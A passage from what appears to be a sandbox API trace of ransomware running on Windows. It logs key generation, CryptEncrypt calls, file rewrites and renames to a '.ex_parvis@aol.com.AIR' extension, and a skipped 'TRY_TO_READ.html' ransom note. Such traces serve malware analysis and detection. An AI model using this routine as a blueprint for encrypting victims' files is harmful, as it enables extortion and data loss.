pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0132.305] GetProcessHeap () returned 0x2e0000 [0132.305] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0132.305] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0132.305] WriteFile (in: hFile=0x264, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0132.307] WriteFile (in: hFile=0x264, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0132.307] WriteFile (in: hFile=0x264, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0132.307] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x5aa) returned 0x385368 [0132.307] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x5aa) returned 0x385920 [0132.307] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.307] ReadFile (in: hFile=0x264, lpBuffer=0x385368, nNumberOfBytesToRead=0x5aa, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x385368*, lpNumberOfBytesRead=0x2acf9c8*=0x5aa, lpOverlapped=0x0) returned 1 [0132.307] SetFilePointer (in: hFile=0x264, lDistanceToMove=-1450, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.307] WriteFile (in: hFile=0x264, lpBuffer=0x385920*, nNumberOfBytesToWrite=0x5aa, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x385920*, lpNumberOfBytesWritten=0x2acf9c8*=0x5aa, lpOverlapped=0x0) returned 1 [0132.307] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385368 | out: hHeap=0x2e0000) returned 1 [0132.307] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385920 | out: hHeap=0x2e0000) returned 1 [0132.307] CloseHandle (hObject=0x264) returned 1 [0132.308] GetProcessHeap () returned 0x2e0000 [0132.308] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0132.308] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0132.308] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0132.308] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33acb8 | out: hHeap=0x2e0000) returned 1 [0132.308] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x33ac00 | out: hHeap=0x2e0000) returned 1 [0132.308] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xb0) returned 0x33ac00 [0132.308] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0132.308] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0132.309] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0132.309] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0132.309] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi", dwFileAttributes=0x80) returned 1 [0132.309] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned 80 [0132.309] GetProcessHeap () returned 0x2e0000 [0132.309] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x106) returned 0x319c88 [0132.309] lstrcpyW (in: lpString1=0x319c88, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" [0132.309] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" [0132.309] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0132.313] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x264 [0132.313] GetProcessHeap () returned 0x2e0000 [0132.313] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319c88 | out: hHeap=0x2e0000) returned 1 [0132.313] GetFileSizeEx (in: hFile=0x264, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=2513920) returned 1 [0132.313] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x265c00 [0132.313] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0132.313] GetProcessHeap () returned 0x2e0000 [0132.313] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0132.313] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0132.313] WriteFile (in: hFile=0x264, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0132.315] WriteFile (in: hFile=0x264, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0132.315] WriteFile (in: hFile=0x264, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0132.315] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x265c00) returned 0x30d0020 [0132.316] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x265c00) returned 0x3340020 [0132.316] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.316] ReadFile (in: hFile=0x264, lpBuffer=0x30d0020, nNumberOfBytesToRead=0x265c00, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30d0020*, lpNumberOfBytesRead=0x2acf9c8*=0x265c00, lpOverlapped=0x0) returned 1 [0132.460] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x971d0bb0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x971d0bb0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35ded8 [0132.460] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0132.460] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0132.460] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328bd8 [0132.460] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0132.460] GetLastError () returned 0x0 [0132.460] FindNextFileW (in: hFindFile=0x35ded8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee829690, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x971d0bb0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x971d0bb0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0132.460] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0132.460] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0132.460] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328bd8 [0132.460] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0132.460] GetLastError () returned 0x0 [0132.460] FindNextFileW (in: hFindFile=0x35ded8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3a6f2400, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3a6f2400, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xeebe0180, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xe21fcc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OutlkLR.cab", cAlternateFileName="")) returned 1 [0132.460] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0132.461] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0132.461] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328bd8 [0132.461] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0132.461] GetLastError () returned 0x0 [0132.461] FindNextFileW (in: hFindFile=0x35ded8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee827f20, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2bba00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OutlookMUI.msi", cAlternateFileName="OUTLOO~1.MSI")) returned 1 [0132.461] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0132.461] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0132.461] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328bd8 [0132.461] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0132.461] GetLastError () returned 0x0 [0132.461] FindNextFileW (in: hFindFile=0x35ded8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee827f20, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xc72, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OutlookMUI.xml", cAlternateFileName="OUTLOO~1.XML")) returned 1 [0132.461] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0132.461] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0132.461] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328bd8 [0132.461] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0132.461] GetLastError () returned 0x0 [0132.461] FindNextFileW (in: hFindFile=0x35ded8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf00db300, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x106f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0132.461] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0132.461] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0132.461] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328bd8 [0132.461] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0132.461] GetLastError () returned 0x0 [0132.461] FindNextFileW (in: hFindFile=0x35ded8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x971d0bb0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x971d0bb0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x971d0bb0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0132.461] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x30e128 | out: hHeap=0x2e0000) returned 1 [0132.461] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x40) returned 0x384248 [0132.461] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x80) returned 0x328bd8 [0132.461] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x384248 | out: hHeap=0x2e0000) returned 1 [0132.461] GetLastError () returned 0x0 [0132.461] FindNextFileW (in: hFindFile=0x35ded8, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x971d0bb0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x971d0bb0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x971d0bb0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0132.461] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x385368 [0132.461] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0132.461] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0132.461] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0132.462] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0132.462] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", dwFileAttributes=0x80) returned 1 [0132.462] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 73 [0132.462] GetProcessHeap () returned 0x2e0000 [0132.462] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xf8) returned 0x385410 [0132.462] lstrcpyW (in: lpString1=0x385410, lpString2="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" [0132.462] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" [0132.462] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0132.467] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x478 [0132.467] GetProcessHeap () returned 0x2e0000 [0132.467] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385410 | out: hHeap=0x2e0000) returned 1 [0132.467] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=4207) returned 1 [0132.467] SetFilePointer (in: hFile=0x478, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x106f [0132.468] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0132.468] GetProcessHeap () returned 0x2e0000 [0132.468] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363a50 [0132.468] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363a50*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0132.468] WriteFile (in: hFile=0x478, lpBuffer=0x363a50*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363a50*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0132.469] WriteFile (in: hFile=0x478, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0132.469] WriteFile (in: hFile=0x478, lpBuffer=0x383d90*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383d90*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0132.469] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x106f) returned 0x385410 [0132.469] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x106f) returned 0x386488 [0132.469] SetFilePointer (in: hFile=0x478, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.470] ReadFile (in: hFile=0x478, lpBuffer=0x385410, nNumberOfBytesToRead=0x106f, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x385410*, lpNumberOfBytesRead=0x2acf9c8*=0x106f, lpOverlapped=0x0) returned 1 [0132.470] SetFilePointer (in: hFile=0x478, lDistanceToMove=-4207, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.470] WriteFile (in: hFile=0x478, lpBuffer=0x386488*, nNumberOfBytesToWrite=0x106f, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x386488*, lpNumberOfBytesWritten=0x2acf9c8*=0x106f, lpOverlapped=0x0) returned 1 [0132.470] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385410 | out: hHeap=0x2e0000) returned 1 [0132.470] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x386488 | out: hHeap=0x2e0000) returned 1 [0132.470] CloseHandle (hObject=0x478) returned 1 [0132.471] GetProcessHeap () returned 0x2e0000 [0132.471] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363a50 | out: hHeap=0x2e0000) returned 1 [0132.471] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x363948 | out: hHeap=0x2e0000) returned 1 [0132.471] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x383d90 | out: hHeap=0x2e0000) returned 1 [0132.471] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385368 | out: hHeap=0x2e0000) returned 1 [0132.471] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0132.471] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xa0) returned 0x319d30 [0132.471] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x100) returned 0x363948 [0132.471] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x8) returned 0x383d90 [0132.471] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363948 | out: pbBuffer=0x363948) returned 1 [0132.471] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383d90 | out: pbBuffer=0x383d90) returned 1 [0132.471] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", dwFileAttributes=0x80) returned 1 [0132.472] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 78 [0132.472] GetProcessHeap () returned 0x2e0000 [0132.472] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x102) returned 0x385368 [0132.472] lstrcpyW (in: lpString1=0x385368, lpString2="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" [0132.472] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" [0132.472] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0132.475] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x478 [0132.475] GetProcessHeap () returned 0x2e0000 [0132.475] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x385368 | out: hHeap=0x2e0000) returned 1 [0132.475] GetFileSizeEx (in: hFile=0x478, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=3186) returned 1 [0132.475] SetFilePointer (in: hFile=0x478, lDistanceToMove=0, 